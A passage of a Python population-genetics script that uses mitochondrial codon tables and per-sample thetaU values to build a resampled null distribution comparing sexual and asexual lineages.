'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 
'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'trematodeMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'M', 'AGG': 'S', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'N', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'},'pterobranchiaMt':{'CTT': 'L', 'TAG': '*', 'ACA': 'T', 'ACG': 'T', 'ATC': 'I', 'AAC': 'N', 'ATA': 'I', 'AGG': 'K', 'CCT': 'P', 'ACT': 'T', 'AGC': 'S', 'AAG': 'K', 'AGA': 'S', 'CAT': 'H', 'AAT': 'N', 'ATT': 'I', 'CTG': 'L', 'CTA': 'L', 'CTC': 'L', 'CAC': 'H', 'AAA': 'K', 'CCG': 'P', 'AGT': 'S', 'CCA': 'P', 'CAA': 'Q', 'CCC': 'P', 'TAT': 'Y', 'GGT': 'G', 'TGT': 'C', 'CGA': 'R', 'CAG': 'Q', 'TCT': 'S', 'GAT': 'D', 'CGG': 'R', 'TTT': 'F', 'TGC': 'C', 'GGG': 'G', 'TGA': 'W', 'GGA': 'G', 'TGG': 'W', 'GGC': 'G', 'TAC': 'Y', 'TTC': 'F', 'TCG': 'S', 'TTA': 'L', 'TTG': 'L', 'TCC': 'S', 'ACC': 'T', 'TAA': '*', 'GCA': 'A', 'GTA': 'V', 'GCC': 'A', 'GTC': 'V', 'GCG': 'A', 'GTG': 'V', 'GAG': 'E', 'GTT': 'V', 'GCT': 'A', 'GAC': 'D', 'CGT': 'R', 'GAA': 'E', 'TCA': 'S', 'ATG': 'M', 'CGC': 'R'}}
geneticCode = geneticCodes[code]
startCodons = ['ATT','ATC','ATA','ATG','GTG'] #invertebrateMt code
positionDict = {(0,1533):'COI',(1533,2217):'COII',(2217,2373):'ATP8',(2373,3066):'ATP6',(3066,4005):'ND1',(4005,4509):'ND6',(4509,5646):'CYTB',(5646,5940):'ND4L',(5940,7314):'ND4',(7314,9030):'ND5',(9030,9807):'COIII',(9807,10158):'ND3',(10158,11214):'ND2'} #{(start,stop):gene}
seqDict, seqList, codonDict = buildCodonDict(fasta)
popList = []
sexList = []
outList = []
thetaUSDict = {">$Heron2":(3,2598), ">$clone_1":(2,2598), ">$Rotoiti_1_4n":(2,2594.35416672), ">$AC51":(0,2598.33333333), ">$Heron_mitochondrion":(0,2599), ">$Grasmere_6_3n":(0,2599.62500001), ">$Poerua_triploid":(2,2597), ">$Brunner_6_3n":(2,2592.9583334), ">$McGregor":(0,2599), ">$Poerua_72_4n":(0,2605.47916675), ">$Gunn":(4,2597.66666667), ">$Grasmere_1_4n":(1,2628.66666703), ">$clone_7":(0,2592.85416667), ">$DenmarkA":(0,2593.125), ">$Duluth":(0,2591.52083333), ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":(3,2593.79166667), ">$Waik37":(0,2586.58333333), ">$Waik372":(4,2589.25), ">$Tarawera":(0,2586.58333333), ">$Kaniere_triploid":(1,2586.58333333), ">$Waik36":(14,2586.91666667), ">$WalesC":(2,2584.91666667), ">$Brunner_2_4n":(0,2593.60416674), ">$Lady":(9,2598.66666667), ">$Kaniere_1_2n":(9,2598.33333333), ">$Rotoroa_1_2n":(13,2598.58333338), ">$AlexMap":(0,2592.33333333), ">$Alexsex":(0,2592.33333333), ">$Yellow_Contig_56":(0,2592.33333333), ">$Ianthe":(4,2597), ">$Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":(4,2595)}
thetaUmeanCDict = {">$Heron2":(1,4307.57142857), ">$clone_1":(0,4307.80952381), ">$Rotoiti_1_4n":(0,4283.76190474), ">$AC51":(0,4307.04761905), ">$Heron_mitochondrion":(0,4307.04761905), ">$Grasmere_6_3n":(0,4299.99999999), ">$Poerua_triploid":(1,4308.90476191), ">$Brunner_6_3n":(3,4277.5238095), ">$McGregor":(0,4307.14285714), ">$Poerua_72_4n":(0,4263.99999996), ">$Gunn":(1,4308.57142857), ">$Grasmere_1_4n":(1,4132.47619032), ">$clone_7":(0,4310.19047619), ">$DenmarkA":(0,4310.04761905), ">$Duluth":(0,4310.80952381), ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":(0,4308.85714286), ">$Waik37":(0,4311.76190476), ">$Waik372":(4,4314.52380952), ">$Tarawera":(0,4312.28571428), ">$Kaniere_triploid":(0,4312.80952381), ">$Waik36":(6,4313.14285714), ">$WalesC":(3,4315), ">$Brunner_2_4n":(3,4273.47619044), ">$Lady":(5,4307.52380952), ">$Kaniere_1_2n":(2,4308.23809524), ">$Rotoroa_1_2n":(4,4280.80952379), ">$AlexMap":(0,4311), ">$Alexsex":(0,4311), ">$Yellow_Contig_56":(0,4311), ">$Ianthe":(1,4308.52380952), ">$Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":(1,4309.19047619)}
thetaUmeanRDict = {">$Heron2":(0,4308.42857143), ">$clone_1":(0,4308.19047619), ">$Rotoiti_1_4n":(0,4335.88392856), ">$AC51":(1,4308.61904762), ">$Heron_mitochondrion":(0,4307.95238095), ">$Grasmere_6_3n":(1,4314.375), ">$Poerua_triploid":(0,4308.09523809), ">$Brunner_6_3n":(3,4343.51785713), ">$McGregor":(0,4307.85714286), ">$Poerua_72_4n":(0,4344.52083332), ">$Gunn":(3,4307.76190476), ">$Grasmere_1_4n":(1,4452.85714279999), ">$clone_7":(0,4310.95535714), ">$DenmarkA":(0,4310.82738095), ">$Duluth":(1,4311.66964286), ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":(1,4311.35119048), ">$Waik37":(1,4315.65476191), ">$Waik372":(3,4310.22619048), ">$Tarawera":(0,4315.13095238), ">$Kaniere_triploid":(0,4314.60714286), ">$Waik36":(0,4313.94047619), ">$WalesC":(0,4314.08333333), ">$Brunner_2_4n":(3,4346.91964285), ">$Lady":(1,4307.80952381), ">$Kaniere_1_2n":(0,4307.42857143), ">$Rotoroa_1_2n":(1,4334.60714285), ">$AlexMap":(0,4310.66666667), ">$Alexsex":(0,4310.66666667), ">$Yellow_Contig_56":(0,4310.66666667), ">$Ianthe":(0,4308.47619048), ">$Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":(2,4309.80952381)}
thetaUC1Dict = {">$Heron2":(1,6320.33333333), ">$clone_1":(0,6319.66666667), ">$Rotoiti_1_4n":(0,6264.68749995), ">$AC51":(0,6318.66666667), ">$Heron_mitochondrion":(0,6319.33333333), ">$Grasmere_6_3n":(1,6307.62499999), ">$Poerua_triploid":(1,6321.66666667), ">$Brunner_6_3n":(4,6262.95833327), ">$McGregor":(0,6319), ">$Poerua_72_4n":(0,6232.81249992), ">$Gunn":(2,6324.33333333), ">$Grasmere_1_4n":(1,5990.99999963), ">$clone_7":(0,6322.52083333), ">$DenmarkA":(0,6322.45833333), ">$Duluth":(1,6323.85416667), ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":(0,6320.125), ">$Waik37":(0,6327.25), ">$Waik372":(6,6330.58333333), ">$Tarawera":(0,6329.25), ">$Kaniere_triploid":(0,6330.58333333), ">$Waik36":(6,6330.25), ">$WalesC":(3,6333.25), ">$Brunner_2_4n":(4,6259.27083326), ">$Lady":(6,6318), ">$Kaniere_1_2n":(2,6320.33333333), ">$Rotoroa_1_2n":(4,6271.58333329), ">$AlexMap":(0,6326.33333333), ">$Alexsex":(0,6326.33333333), ">$Yellow_Contig_56":(0,6326.33333333), ">$Ianthe":(1,6321.33333333), ">$Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":(2,6321)}
thetaUC2Dict = {">$Heron2":(1,5090.33333333), ">$clone_1":(0,5091.33333333), ">$Rotoiti_1_4n":(0,5085.97916662), ">$AC51":(1,5089.33333333), ">$Heron_mitochondrion":(0,5088.66666667), ">$Grasmere_6_3n":(0,5084.70833332), ">$Poerua_triploid":(1,5092), ">$Brunner_6_3n":(4,5076.37499994), ">$McGregor":(0,5089.66666667), ">$Poerua_72_4n":(0,5059.52083325), ">$Gunn":(2,5090.33333333), ">$Grasmere_1_4n":(2,4999.33333297), ">$clone_7":(0,5092.14583333), ">$DenmarkA":(0,5091.875), ">$Duluth":(0,5093.47916667), ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":(1,5091.20833333), ">$Waik37":(0,5096.75), ">$Waik372":(4,5097.41666667), ">$Tarawera":(0,5097.08333333), ">$Kaniere_triploid":(0,5096.75), ">$Waik36":(3,5100.75), ">$WalesC":(1,5101.75), ">$Brunner_2_4n":(3,5082.39583326), ">$Lady":(4,5089), ">$Kaniere_1_2n":(0,5090), ">$Rotoroa_1_2n":(5,5078.41666662), ">$AlexMap":(0,5097.33333333), ">$Alexsex":(0,5097.33333333), ">$Yellow_Contig_56":(0,5097.33333333), ">$Ianthe":(1,5093), ">$Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":(2,5095.33333333)}
thetaUC3Dict = {">$Heron2":(0,2945), ">$clone_1":(0,2944.66666667), ">$Rotoiti_1_4n":(0,2932.12499995), ">$AC51":(0,2945), ">$Heron_mitochondrion":(0,2944.66666667), ">$Grasmere_6_3n":(0,2941.74999999), ">$Poerua_triploid":(1,2945.66666667), ">$Brunner_6_3n":(2,2925.4166666), ">$McGregor":(0,2945), ">$Poerua_72_4n":(0,2926.20833325), ">$Gunn":(1,2944), ">$Grasmere_1_4n":(0,2832.33333297), ">$clone_7":(0,2949.79166667), ">$DenmarkA":(0,2949.75), ">$Duluth":(0,2949.125), ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":(0,2948.75), ">$Waik37":(0,2950.5), ">$Waik372":(1,2952.83333333), ">$Tarawera":(0,2950.5), ">$Kaniere_triploid":(0,2950.83333333), ">$Waik36":(6,2947.16666667), ">$WalesC":(3,2950.83333333), ">$Brunner_2_4n":(3,2917.29166659), ">$Lady":(4,2947.33333333), ">$Kaniere_1_2n":(2,2945.66666667), ">$Rotoroa_1_2n":(1,2928.16666662), ">$AlexMap":(0,2946.66666667), ">$Alexsex":(0,2946.66666667), ">$Yellow_Contig_56":(0,2946.66666667), ">$Ianthe":(1,2945.33333333), ">$Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":(1,2945.33333333)}
thetaUC4Dict = {">$Heron2":(0,3419.66666667), ">$clone_1":(0,3419.33333333), ">$Rotoiti_1_4n":(0,3422.85416662), ">$AC51":(0,3419), ">$Heron_mitochondrion":(0,3419), ">$Grasmere_6_3n":(0,3416.95833332), ">$Poerua_triploid":(1,3421), ">$Brunner_6_3n":(3,3421.95833327), ">$McGregor":(0,3420), ">$Poerua_72_4n":(0,3422.97916658), ">$Gunn":(2,3420), ">$Grasmere_1_4n":(0,3382.99999963), ">$clone_7":(0,3422.6875), ">$DenmarkA":(0,3422.45833333), ">$Duluth":(0,3422.02083333), ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":(0,3421.79166667), ">$Waik37":(0,3424.58333333), ">$Waik372":(0,3428.25), ">$Tarawera":(0,3424.91666667), ">$Kaniere_triploid":(0,3423.58333333), ">$Waik36":(6,3420.25), ">$WalesC":(3,3423.25), ">$Brunner_2_4n":(3,3405.10416659), ">$Lady":(4,3423), ">$Kaniere_1_2n":(2,3420.33333333), ">$Rotoroa_1_2n":(1,3414.91666662), ">$AlexMap":(0,3420.66666667), ">$Alexsex":(0,3420.66666667), ">$Yellow_Contig_56":(0,3420.66666667), ">$Ianthe":(1,3419.33333333), ">$Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":(1,3420)}
thetaUC5Dict = {">$Heron2":(0,4382.33333333), ">$clone_1":(0,4382.33333333), ">$Rotoiti_1_4n":(0,4363.35416667), ">$AC51":(0,4382), ">$Heron_mitochondrion":(0,4382.33333333), ">$Grasmere_6_3n":(1,4375.95833333), ">$Poerua_triploid":(1,4383.33333333), ">$Brunner_6_3n":(4,4354.95833333), ">$McGregor":(0,4382), ">$Poerua_72_4n":(0,4354.14583333), ">$Gunn":(2,4382.66666667), ">$Grasmere_1_4n":(0,4238), ">$clone_7":(0,4385.1875), ">$DenmarkA":(0,4385.125), ">$Duluth":(1,4384.85416667), ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":(0,4383.79166667), ">$Waik37":(0,4385.58333333), ">$Waik372":(2,4390.58333333), ">$Tarawera":(0,4385.58333333), ">$Kaniere_triploid":(0,4386.25), ">$Waik36":(6,4383.58333333), ">$WalesC":(3,4385.58333333), ">$Brunner_2_4n":(4,4338.9375), ">$Lady":(6,4385.33333333), ">$Kaniere_1_2n":(2,4383.33333333), ">$Rotoroa_1_2n":(2,4354.91666667), ">$AlexMap":(0,4381.66666667), ">$Alexsex":(0,4381.66666667), ">$Yellow_Contig_56":(0,4381.66666667), ">$Ianthe":(1,4384.66666667), ">$Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":(2,4384)}
thetaUC6Dict = {">$Heron2":(1,4124.66666667), ">$clone_1":(0,4125.66666667), ">$Rotoiti_1_4n":(0,4084.39583338), ">$AC51":(0,4124.66666667), ">$Heron_mitochondrion":(0,4125), ">$Grasmere_6_3n":(0,4112.54166668), ">$Poerua_triploid":(1,4126), ">$Brunner_6_3n":(3,4075.2083334), ">$McGregor":(0,4124.33333333), ">$Poerua_72_4n":(0,4050.43750008), ">$Gunn":(0,4126.33333333), ">$Grasmere_1_4n":(1,3848.3333337), ">$clone_7":(0,4126.89583333), ">$DenmarkA":(0,4127.04166667), ">$Duluth":(0,4128.5625), ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":(0,4126.04166667), ">$Waik37":(0,4123.41666667), ">$Waik372":(5,4126.08333333), ">$Tarawera":(0,4124.08333333), ">$Kaniere_triploid":(0,4125.75), ">$Waik36":(3,4130.08333333), ">$WalesC":(1,4129.75), ">$Brunner_2_4n":(3,4078.47916674), ">$Lady":(5,4121), ">$Kaniere_1_2n":(0,4126.33333333), ">$Rotoroa_1_2n":(4,4085.08333338), ">$AlexMap":(0,4127.33333333), ">$Alexsex":(0,4127.33333333), ">$Yellow_Contig_56":(0,4127.33333333), ">$Ianthe":(1,4123.66666667), ">$Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":(1,4125)}
thetaUC7Dict = {">$Heron2":(1,3870.66666667), ">$clone_1":(0,3871.66666667), ">$Rotoiti_1_4n":(0,3832.9375), ">$AC51":(0,3870.66666667), ">$Heron_mitochondrion":(0,3870.33333333), ">$Grasmere_6_3n":(0,3860.45833333), ">$Poerua_triploid":(1,3872.66666667), ">$Brunner_6_3n":(3,3825.79166667), ">$McGregor":(0,3870), ">$Poerua_72_4n":(0,3801.89583333), ">$Gunn":(0,3872.33333333), ">$Grasmere_1_4n":(1,3635.33333333), ">$clone_7":(0,3872.10416667), ">$DenmarkA":(0,3871.625), ">$Duluth":(0,3873.77083333), ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":(0,3870.29166667), ">$Waik37":(0,3874.25), ">$Waik372":(4,3875.91666667), ">$Tarawera":(0,3874.58333333), ">$Kaniere_triploid":(0,3875.91666667), ">$Waik36":(3,3879.91666667), ">$WalesC":(1,3880.58333333), ">$Brunner_2_4n":(3,3832.85416667), ">$Lady":(4,3869), ">$Kaniere_1_2n":(0,3871.66666667), ">$Rotoroa_1_2n":(4,3832.58333333), ">$AlexMap":(0,3877), ">$Alexsex":(0,3877), ">$Yellow_Contig_56":(0,3877), ">$Ianthe":(1,3872.33333333), ">$Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":(1,3873.66666667)}
thetaUR1Dict = {">$Heron2":(0,2295.66666667), ">$clone_1":(0,2296.33333333), ">$Rotoiti_1_4n":(0,2354.95833333), ">$AC51":(1,2297), ">$Heron_mitochondrion":(0,2295.66666667), ">$Grasmere_6_3n":(0,2306.75), ">$Poerua_triploid":(0,2295.33333333), ">$Brunner_6_3n":(2,2358.08333333), ">$McGregor":(0,2296), ">$Poerua_72_4n":(0,2375.70833333), ">$Gunn":(2,2292), ">$Grasmere_1_4n":(1,2594.33333333), ">$clone_7":(0,2298.625), ">$DenmarkA":(0,2298.41666667), ">$Duluth":(0,2298.625), ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":(1,2300.08333333), ">$Waik37":(1,2300.16666667), ">$Waik372":(1,2294.16666667), ">$Tarawera":(0,2298.16666667), ">$Kaniere_triploid":(0,2296.83333333), ">$Waik36":(0,2296.83333333), ">$WalesC":(0,2295.83333333), ">$Brunner_2_4n":(2,2361.125), ">$Lady":(0,2297.33333333), ">$Kaniere_1_2n":(0,2295.33333333), ">$Rotoroa_1_2n":(1,2343.83333333), ">$AlexMap":(0,2295.33333333), ">$Alexsex":(0,2295.33333333), ">$Yellow_Contig_56":(0,2295.33333333), ">$Ianthe":(0,2295.66666667), ">$Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":(1,2298)}
thetaUR2Dict = {">$Heron2":(0,3525.66666667), ">$clone_1":(0,3524.66666667), ">$Rotoiti_1_4n":(0,3533.66666667), ">$AC51":(0,3526.33333333), ">$Heron_mitochondrion":(0,3526.33333333), ">$Grasmere_6_3n":(1,3529.66666667), ">$Poerua_triploid":(0,3525), ">$Brunner_6_3n":(2,3544.66666667), ">$McGregor":(0,3525.33333333), ">$Poerua_72_4n":(0,3549), ">$Gunn":(2,3526), ">$Grasmere_1_4n":(0,3586), ">$clone_7":(0,3529), ">$DenmarkA":(0,3529), ">$Duluth":(1,3529), ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":(0,3529), ">$Waik37":(1,3530.66666667), ">$Waik372":(3,3527.33333333), ">$Tarawera":(0,3530.33333333), ">$Kaniere_triploid":(0,3530.66666667), ">$Waik36":(3,3526.33333333), ">$WalesC":(2,3527.33333333), ">$Brunner_2_4n":(3,3538), ">$Lady":(2,3526.33333333), ">$Kaniere_1_2n":(2,3525.66666667), ">$Rotoroa_1_2n":(0,3537), ">$AlexMap":(0,3524.33333333), ">$Alexsex":(0,3524.33333333), ">$Yellow_Contig_56":(0,3524.33333333), ">$Ianthe":(0,3524), ">$Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":(1,3523.66666667)}
thetaUR3Dict = {">$Heron2":(1,5671), ">$clone_1":(0,5671.33333333), ">$Rotoiti_1_4n":(0,5687.52083333), ">$AC51":(1,5670.66666667), ">$Heron_mitochondrion":(0,5670.33333333), ">$Grasmere_6_3n":(1,5672.625), ">$Poerua_triploid":(0,5671.33333333), ">$Brunner_6_3n":(4,5695.625), ">$McGregor":(0,5670), ">$Poerua_72_4n":(0,5682.3125), ">$Gunn":(3,5672.33333333), ">$Grasmere_1_4n":(2,5753), ">$clone_7":(0,5671.35416667), ">$DenmarkA":(0,5671.125), ">$Duluth":(1,5673.35416667), ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":(1,5671.45833333), ">$Waik37":(1,5676.91666667), ">$Waik372":(6,5671.91666667), ">$Tarawera":(0,5676.91666667), ">$Kaniere_triploid":(0,5676.58333333), ">$Waik36":(0,5679.91666667), ">$WalesC":(0,5678.25), ">$Brunner_2_4n":(3,5703.10416667), ">$Lady":(2,5668), ">$Kaniere_1_2n":(0,5670), ">$Rotoroa_1_2n":(4,5687.25), ">$AlexMap":(0,5675), ">$Alexsex":(0,5675), ">$Yellow_Contig_56":(0,5675), ">$Ianthe":(0,5671.66666667), ">$Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":(2,5673.66666667)}
thetaUR4Dict = {">$Heron2":(1,5196.33333333), ">$clone_1":(0,5196.66666667), ">$Rotoiti_1_4n":(0,5196.79166667), ">$AC51":(1,5196.66666667), ">$Heron_mitochondrion":(0,5196), ">$Grasmere_6_3n":(1,5197.41666667), ">$Poerua_triploid":(0,5196), ">$Brunner_6_3n":(3,5199.08333333), ">$McGregor":(0,5195), ">$Poerua_72_4n":(0,5185.54166667), ">$Gunn":(2,5196.33333333), ">$Grasmere_1_4n":(2,5202.33333333), ">$clone_7":(0,5198.45833333), ">$DenmarkA":(0,5198.41666667), ">$Duluth":(1,5200.45833333), ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":(1,5198.41666667), ">$Waik37":(1,5202.83333333), ">$Waik372":(7,5196.5), ">$Tarawera":(0,5202.5), ">$Kaniere_triploid":(0,5203.83333333), ">$Waik36":(0,5206.83333333), ">$WalesC":(0,5205.83333333), ">$Brunner_2_4n":(3,5215.29166667), ">$Lady":(2,5192.33333333), ">$Kaniere_1_2n":(0,5195.33333333), ">$Rotoroa_1_2n":(4,5200.5), ">$AlexMap":(0,5201), ">$Alexsex":(0,5201), ">$Yellow_Contig_56":(0,5201), ">$Ianthe":(0,5197.66666667), ">$Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":(2,5199)}
thetaUR5Dict = {">$Heron2":(1,4233.66666667), ">$clone_1":(0,4233.66666667), ">$Rotoiti_1_4n":(0,4256.29166662), ">$AC51":(1,4233.66666667), ">$Heron_mitochondrion":(0,4232.66666667), ">$Grasmere_6_3n":(0,4238.41666665), ">$Poerua_triploid":(0,4233.66666667), ">$Brunner_6_3n":(2,4266.08333327), ">$McGregor":(0,4233), ">$Poerua_72_4n":(0,4254.37499992), ">$Gunn":(2,4233.66666667), ">$Grasmere_1_4n":(2,4347.33333297), ">$clone_7":(0,4235.95833333), ">$DenmarkA":(0,4235.75), ">$Duluth":(0,4237.625), ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":(1,4236.41666667), ">$Waik37":(1,4241.83333333), ">$Waik372":(5,4234.16666667), ">$Tarawera":(0,4241.83333333), ">$Kaniere_triploid":(0,4241.16666667), ">$Waik36":(0,4243.5), ">$WalesC":(0,4243.5), ">$Brunner_2_4n":(2,4281.45833326), ">$Lady":(0,4230), ">$Kaniere_1_2n":(0,4232.33333333), ">$Rotoroa_1_2n":(3,4260.49999996), ">$AlexMap":(0,4240), ">$Alexsex":(0,4240), ">$Yellow_Contig_56":(0,4240), ">$Ianthe":(0,4232.33333333), ">$Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":(1,4235)}
thetaUR6Dict = {">$Heron2":(0,4491.33333333), ">$clone_1":(0,4490.33333333), ">$Rotoiti_1_4n":(0,4535.25000005), ">$AC51":(1,4491), ">$Heron_mitochondrion":(0,4490), ">$Grasmere_6_3n":(1,4501.83333335), ">$Poerua_triploid":(0,4491), ">$Brunner_6_3n":(3,4545.8333334), ">$McGregor":(0,4490.66666667), ">$Poerua_72_4n":(0,4558.08333342), ">$Gunn":(4,4490), ">$Grasmere_1_4n":(1,4737.00000037), ">$clone_7":(0,4494.25), ">$DenmarkA":(0,4493.83333333), ">$Duluth":(1,4493.91666667), ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":(1,4494.16666667), ">$Waik37":(1,4504), ">$Waik372":(2,4498.66666667), ">$Tarawera":(0,4503.33333333), ">$Kaniere_triploid":(0,4501.66666667), ">$Waik36":(3,4497), ">$WalesC":(2,4499.33333333), ">$Brunner_2_4n":(3,4541.91666674), ">$Lady":(1,4494.33333333), ">$Kaniere_1_2n":(2,4489.33333333), ">$Rotoroa_1_2n":(1,4530.33333338), ">$AlexMap":(0,4494.33333333), ">$Alexsex":(0,4494.33333333), ">$Yellow_Contig_56":(0,4494.33333333), ">$Ianthe":(0,4493.33333333), ">$Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":(2,4494)}
thetaUR7Dict = {">$Heron2":(0,4745.33333333), ">$clone_1":(0,4744.33333333), ">$Rotoiti_1_4n":(0,4786.70833328), ">$AC51":(1,4745), ">$Heron_mitochondrion":(0,4744.66666667), ">$Grasmere_6_3n":(1,4753.91666665), ">$Poerua_triploid":(0,4744.33333333), ">$Brunner_6_3n":(3,4795.24999994), ">$McGregor":(0,4745), ">$Poerua_72_4n":(0,4806.62499992), ">$Gunn":(4,4744), ">$Grasmere_1_4n":(1,4949.99999963), ">$clone_7":(0,4749.04166667), ">$DenmarkA":(0,4749.25), ">$Duluth":(1,4748.70833333), ">$Waik_lane4_TCCTGAGC_trimmed_paired_contig_237":(1,4749.91666667), ">$Waik37":(1,4753.16666667), ">$Waik372":(3,4748.83333333), ">$Tarawera":(0,4752.83333333), ">$Kaniere_triploid":(0,4751.5), ">$Waik36":(3,4747.16666667), ">$WalesC":(2,4748.5), ">$Brunner_2_4n":(3,4787.54166659), ">$Lady":(2,4746.33333333), ">$Kaniere_1_2n":(2,4744), ">$Rotoroa_1_2n":(1,4782.83333329), ">$AlexMap":(0,4744.66666667), ">$Alexsex":(0,4744.66666667), ">$Yellow_Contig_56":(0,4744.66666667), ">$Ianthe":(0,4744.66666667), ">$Ianthe_lane1_TAAGGCGA_trimmed_paired_contig_309":(2,4745.33333333)}
D1 = {'mean':[],1:[],2:[],3:[],4:[],5:[],6:[],7:[]}#thetaU-C/thetaU-S
D2 = {'mean':[],1:[],2:[],3:[],4:[],5:[],6:[],7:[]}#thetaU-R/thetaU-S
logfile = open('mt_nullDistribution_thetaU.log','w')
for seq in seqList:
if '$' in seq:
popList.append(seq)
else:
outList.append(seq)
seqNums = range(len(popList))
currPCT = 0
sexN = 8
asexN = 23
sexAn = aN(sexN)
asexAn = aN(asexN)
logfile.write('Calculating population genetic parameters:\n')
logfile.close()
while len(D1['mean']) < 10000:
newPCT = int(round(100*len(D1['mean'])/10000.0))
if newPCT > currPCT:
logfile = open('mt_nullDistribution_thetaU.log','a')
logfile.write('\t' + str(newPCT) + '% complete\n')
logfile.close()
currPCT = newPCT
sexList = []
asexList = []
while len(sexList) < sexN:
currNum = random.choice(seqNums)
if popList[currNum] not in sexList:
sexList.append(popList[currNum])
while len(asexList) < asexN:
currNum = random.choice(seqNums)
if popList[currNum] not in asexList and popList[currNum] not in sexList:
asexList.append(popList[currNum])
asexSS = 0
asexMeanCS = 0
asexMeanRS = 0
asexC1S = 0
asexC2S = 0
asexC3S = 0
asexC4S = 0
asexC5S = 0
asexC6S = 0
asexC7S = 0
asexR1S = 0
asexR2S = 0
asexR3S = 0
asexR4S = 0
asexR5S = 0
asexR6S = 0
asexR7S = 0
sexSS = 0
sexMeanCS = 0
sexMeanRS = 0
sexC1S = 0
sexC2S = 0
sexC3S = 0
sexC4S = 0
sexC5S = 0
sexC6S = 0
sexC7S = 0
sexR1S = 0
sexR2S = 0
sexR3S = 0
sexR4S = 0
sexR5S = 0
sexR6S = 0
sexR7S = 0
asexSynSites = 0
asexMeanCSites = 0
asexMeanRSites = 0
asexC1Sites = 0
asexC2Sites = 0
asexC3Sites = 0
asexC4Sites = 0
asexC5Sites = 0
asexC6Sites = 0
asexC7Sites = 0
asexR1Sites = 0
asexR2Sites = 0
asexR3Sites = 0
asexR4Sites = 0
asexR5Sites = 0
asexR6Sites = 0
asexR7Sites = 0
sexSynSites = 0
sexMeanCSites = 0
sexMeanRSites = 0
sexC1Sites = 0
sexC2Sites = 0
sexC3Sites = 0
sexC4Sites = 0
sexC5Sites = 0
sexC6Sites = 0
sexC7Sites = 0
sexR1Sites = 0
sexR2Sites = 0
sexR3Sites = 0
sexR4Sites = 0
sexR5Sites = 0
sexR6Sites = 0
sexR7Sites = 0
for asexual in asexList:
currSynValues = thetaUSDict[asexual]
asexSS += currSynValues[0]
asexSynSites += currSynValues[1]
currMeanCValues = thetaUmeanCDict[asexual]
asexMeanCS += currMeanCValues[0]
asexMeanCSites += currMeanCValues[1]
currMeanRValues = thetaUmeanRDict[asexual]
asexMeanRS += currMeanRValues[0]
asexMeanRSites += currMeanRValues[1]
currC1Values = thetaUC1Dict[asexual]
asexC1S += currC1Values[0]
asexC1Sites += currC1Values[1]
currC2Values = thetaUC2Dict[asexual]
asexC2S += currC2Values[0]
asexC2Sites += currC2Values[1]
currC3Values = thetaUC3Dict[asexual]
asexC3S += currC3Values[0]
asexC3Sites += currC3Values[1]
currC4Values = thetaUC4Dict[asexual]
asexC4S += currC4Values[0]
asexC4Sites += currC4Values[1]
currC5Values = thetaUC5Dict[asexual]
asexC5S += currC5Values[0]
asexC5Sites += currC5Values[1]
currC6Values = thetaUC6Dict[asexual]
asexC6S += currC6Values[0]
asexC6Sites += currC6Values[1]
currC7Values = thetaUC7Dict[asexual]
asexC7S += currC7Values[0]
asexC7Sites += currC7Values[1]
currR1Values = thetaUR1Dict[asexual]
asexR1S += currR1Values[0]
